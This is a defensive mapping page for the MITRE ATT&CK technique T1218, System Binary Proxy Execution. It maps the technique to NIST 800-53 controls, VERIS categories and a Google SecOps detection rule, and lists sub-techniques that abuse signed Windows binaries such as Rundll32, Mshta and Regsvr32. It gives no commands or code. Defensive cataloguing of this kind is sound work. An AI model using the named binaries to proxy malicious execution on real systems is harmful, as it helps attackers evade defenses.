T1218 System Binary Proxy Execution Mappings

Adversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed, or otherwise trusted, binaries. Binaries used in this technique are often Microsoft-signed files, indicating that they have been either downloaded from Microsoft or are already native in the operating system.(Citation: LOLBAS Project) Binaries signed with trusted digital certificates can typically execute on Windows systems protected by digital signature validation. Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files or commands.

Similarly, on Linux systems adversaries may abuse trusted binaries such as <code>split</code> to proxy execution of malicious commands.(Citation: split man page)(Citation: GTFO split)

View in MITRE ATT&CK®

NIST 800-53 Mappings

Capability ID Capability Description Mapping Type ATT&CK ID ATT&CK Name Notes
CA-07 Continuous Monitoring mitigates T1218 System Binary Proxy Execution
CM-06 Configuration Settings mitigates T1218 System Binary Proxy Execution
CM-05 Access Restrictions for Change mitigates T1218 System Binary Proxy Execution
CM-11 User-installed Software mitigates T1218 System Binary Proxy Execution
SI-16 Memory Protection mitigates T1218 System Binary Proxy Execution
RA-05 Vulnerability Monitoring and Scanning mitigates T1218 System Binary Proxy Execution
CM-08 System Component Inventory mitigates T1218 System Binary Proxy Execution
SI-10 Information Input Validation mitigates T1218 System Binary Proxy Execution
SI-03 Malicious Code Protection mitigates T1218 System Binary Proxy Execution
SI-07 Software, Firmware, and Information Integrity mitigates T1218 System Binary Proxy Execution
CM-02 Baseline Configuration mitigates T1218 System Binary Proxy Execution
IA-02 Identification and Authentication (Organizational Users) mitigates T1218 System Binary Proxy Execution
CM-07 Least Functionality mitigates T1218 System Binary Proxy Execution
SI-04 System Monitoring mitigates T1218 System Binary Proxy Execution
AC-02 Account Management mitigates T1218 System Binary Proxy Execution
AC-06 Least Privilege mitigates T1218 System Binary Proxy Execution
AC-03 Access Enforcement mitigates T1218 System Binary Proxy Execution
AC-05 Separation of Duties mitigates T1218 System Binary Proxy Execution
AC-04 Information Flow Enforcement mitigates T1218 System Binary Proxy Execution
SC-07 Boundary Protection mitigates T1218 System Binary Proxy Execution

VERIS Mappings

Capability ID Capability Description Mapping Type ATT&CK ID ATT&CK Name Notes
action.hacking.variety.Abuse of functionality Abuse of functionality. related-to T1218 System Binary Proxy Execution
action.malware.variety.Destroy data Destroy or corrupt stored data related-to T1218 System Binary Proxy Execution

GCP Mappings

Capability ID Capability Description Mapping Type ATT&CK ID ATT&CK Name Notes
google_secops Google Security Operations technique_scores T1218 System Binary Proxy Execution
Comments
Google Security Ops is able to trigger an alert based on attempts to evade defenses, such as: bypass execution of digitally signed binaries. This technique was scored as minimal based on low or uncertain detection coverage factor. https://github.com/chronicle/detection-rules/blob/783e0e5947774785db1c55041b70176deeca6f46/soc_prime_rules/threat_hunting/process_creation/mavinject_process_injection.yaral
References

ATT&CK Subtechniques

Technique ID Technique Name Number of Mappings
T1218.011 Rundll32 5
T1218.013 Mavinject 13
T1218.004 InstallUtil 12
T1218.007 Msiexec 10
T1218.003 CMSTP 13
T1218.002 Control Panel 12
T1218.015 Electron Applications 20
T1218.008 Odbcconf 12
T1218.012 Verclsid 17
T1218.005 Mshta 13
T1218.001 Compiled HTML File 11
T1218.010 Regsvr32 6
T1218.009 Regsvcs/Regasm 12
T1218.014 MMC 12